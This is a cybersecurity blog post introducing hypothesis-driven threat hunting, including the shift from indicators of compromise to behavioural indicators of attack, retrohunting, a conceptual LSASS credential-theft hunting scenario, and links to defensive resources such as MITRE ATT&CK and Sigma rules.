The Hunt Is On: the Art of Threat Hunting in Modern Cybersecurity
Goodbye IoC Sweeps. Hello Operationalized Hunting.
The Missed Threats Hiding in Plain Sight
Picture this: It's 2 AM, and your security operations center is quiet..a little too quiet. The SIEM dashboards show the usual noise: a flood of low-priority alerts and a handful of suspicious logins that were dismissed as false positives earlier in the day. Unbeknownst to the team, a malicious actor has been lurking in the network for weeks, using legitimate credentials to move laterally and extract sensitive data, byte by byte. No alerts were triggered. No signatures matched.
In today's landscape where attackers evolve faster than defenses, relying solely on reactive security is a recipe for disaster. This is where threat hunting comes in, a proactive approach to identifying and neutralizing threats that evade traditional defenses before they can cause significant damage.
This week's blog is inspired by many conversations, frustrations and misconceptions about what "threat hunting" means. I hope this is informative and actionable and, as always, feedback is welcome!
What is Threat Hunting and Why Does It Matter?
Threat hunting is more than just a buzzword; it's a profession, discipline and arguably the most nuanced component of security operations. Unlike traditional detection methods that rely on alerts and known signatures, threat hunting is about actively seeking out threats that haven't yet tripped any alarms. Think of it as the difference between a home security system that alerts you when a window is broken and a guard who regularly checks for signs of tampering long before an alarm goes off.
Threat hunting is notoriously difficult, and toil-filled. According to a SANS Institute survey, only 11% of organizations can complete a threat hunt in under a day. For most, the process takes days—sometimes weeks. This lag gives attackers the precious time they need to establish persistence, escalate privileges, and move laterally across the network.
The goal of threat hunting is simple yet powerful: reduce dwell time, the duration a threat actor remains undetected in a network. The faster threats are found, the less damage they can inflict.
The Evolution of Threat Hunting: From Indicators to Behaviors
Traditionally, threat detection has focused on Indicators of Compromise (IoCs)—artifacts like file hashes, IP addresses, and URLs associated with known threats. However, sophisticated attackers have long mastered the art of evasion by frequently changing these indicators. Ironically you don't need to be sophisticated to do this, with a hex editor and some intelligent routing, IoC-based hunting can be bested.
This has led to a shift toward Indicators of Attack (IoAs), a term popularized by CrowdStrike that defines patterns of behavior suggesting malicious intent regardless of the specific tools or techniques used. For instance:
IoC Approach: Detecting a known malicious IP address
IoA Approach: Identifying unusual patterns of PowerShell execution, indicative of post-exploitation activities
Focusing on behaviors rather than artifacts allows hunters to detect advanced threats that blend in with legitimate traffic. This evolution is a necessary step for catching fileless malware, living-off-the-land techniques (LotL), and other advanced persistent threats (APTs) that often go unnoticed by traditional defenses.
The next challenge, however, is how to think about behavioral indicators rather than static ones. What should you be looking for? Where should you start?
The Key Components of a Successful Threat Hunt
Effective threat hunting is a structured process, typically based around different frameworks (we'll dig into those in a future write-up). For the sake of today's example, we'll focus on hypothesis-based threat hunting. Here's how it breaks down, it’s as easy as ABCD:
A) Hypothesis Generation: Start with a Question
Your hunt begins with a hypothesis: a question that guides the investigation
Example: "Are there signs of credential misuse or lateral movement across our network?"
A well-defined hypothesis is essential to focus efforts and avoid the dreaded analysis paralysis—getting lost in a sea of data without a clear objective
A note, you'll want to get specific with your hypotheses. Think about the attack surface and indicators that your hypothesis would show, and ensure that the answers to your hypothesis are provable with the data available.
Great, we've got our hypothesis, let's get some data to test this out!
B) Data Collection: Gathering the Clues
Threat hunters rely on a diverse set of data sources:
Endpoint telemetry: Processes, registry changes, and command execution logs
Network traffic: NetFlow, DNS logs, and SSL/TLS traffic analysis
Cloud and application logs: For identifying anomalies in user access patterns
This is where many teams stumble, with too much data and too little direction. Without a targeted hypothesis, it's easy to drown in log files and SIEM alerts.
C) Behavioral Analytics: Patterns Over Indicators
Behavioral analytics leverages stochastic analysis and machine learning to detect deviations from established baselines:
Credential abuse: Using Jupyter notebooks with statistical methods to identify authentication anomalies
Data exfiltration: Applying time series analysis to detect abnormal outbound traffic patterns
Lateral movement: Implementing graph analysis to visualize and detect unusual network traversal
The key is identifying patterns that suggest an attack in progress—not just artifacts left behind. Stochastic analysis (and SIEM querying) can get you far here.
D) Retrohunting: Leveraging Historical Data
Great, so we’ve come to a semblance of a conclusion (or at least a way to identify what has happened in near real time). Let’s talk about how to look at historical trends. Retrohunting involves querying historical logs to uncover threats that went undetected. This can either be done as a result of your hunts conclusion, by running permutations of similar hunts, but typically involves a new piece of intelligence that spawns a retrospective investigation.
For example, after discovering a new exploit, a threat hunter can retroactively search the last six months of logs for signs of compromise. This technique is invaluable for detecting advanced persistent threats (APTs) that operate in stealth for extended periods.
Real-World Example: Hunting for Credential Theft
Consider this real-world scenario: A security team detects an unusual spike in LSASS.exe access on multiple endpoints which is a telltale sign of credential dumping.
Hypothesis: A threat actor is attempting to extract credentials using LSASS
Data Collection: Correlate logs showing LSASS access with authentication attempts on domain controllers
Analytical Approach: Implement stochastic analysis in Jupyter notebooks to identify statistical anomalies and behavior patterns
Outcome: Identify compromised accounts and contain the threat before lateral movement
This proactive approach is significantly more effective than waiting for a detection rule to fire. Proactivity is the difference between a contained incident and a full-blown breach.
Common Pitfalls and How to Avoid Them
Analysis Paralysis: Drowning in Data
Without a clear hypothesis, even the best threat hunters can fall prey to analysis paralysis. The fix? Start small and iterate—focus on one hypothesis at a time and expand your investigation based on findings.
Alert Fatigue: Too Many False Positives
A common complaint among SOC teams is alert fatigue; spending hours chasing false positives. High-fidelity detections that focus on behavior over signatures can reduce noise significantly and preserve analyst mental energy for actual threats.
Skill Gaps: The Automation Myth
While automation is extremely valuable, it's not a substitute for skilled threat hunters. Automation excels at repetitive tasks like data collection and initial triage, but human expertise is irreplaceable for contextual analysis and hypothesis testing. Invest in both technology and training.
The Future of Threat Hunting
With threat actors evolving their tactics daily, a proactive approach is no longer optional—it's imperative for organizational survival. By focusing on behavior-based detection, leveraging historical data through retrohunting, and integrating automation to handle repetitive tasks, organizations can shift from reactive to proactive security postures.
Where to Start:
Don't wait for the 2 AM alert that never comes. Begin your threat hunting journey today:
Start small: Develop one hypothesis based on your most critical assets
Build a baseline: Understand what "normal" looks like in your environment
Train your team: Invest in the skills needed for effective hunting
Implement the right tools: Ensure you have visibility across your entire attack surface
This is not a comprehensive framework, but it can get you started. If you’ve found other ways to begin your threat hunting journey, I’d love to hear in the comments!
Helpful Resources to Get Started
Ready to transform your security posture? Here are some valuable resources to help you begin your threat hunting journey:
Threat Hunter Playbook: a great resource by Roberto Rodriguez (aka Cyb3rward0g) that I can’t recommend enough: https://github.com/OTRF/ThreatHunter-Playbook
Python for Security: Resources for using Python in cybersecurity, including data analysis libraries like Pandas, NumPy, and SciPy for stochastic analysis. Here’s a good place to start when it comes to threat hunting analytics: https://github.com/Cyb3r-Monk/RITA-J
MITRE ATT&CK Framework: Huge fan, as many of you know. mitre.org/attack
Threat Hunting Project: A collaborative, community-based project for sharing threat hunting ideas and methodologies. threathunting.net
Sigma Rules: Open-source generic signature format for SIEM systems to implement detection as code. github.com/SigmaHQ/sigma
Remember, effective threat hunting is a continuous process, not a one-time effort. Start with small, focused hunts and scale as your team gains experience and confidence.
Stay secure and stay curious, my friends!
Damien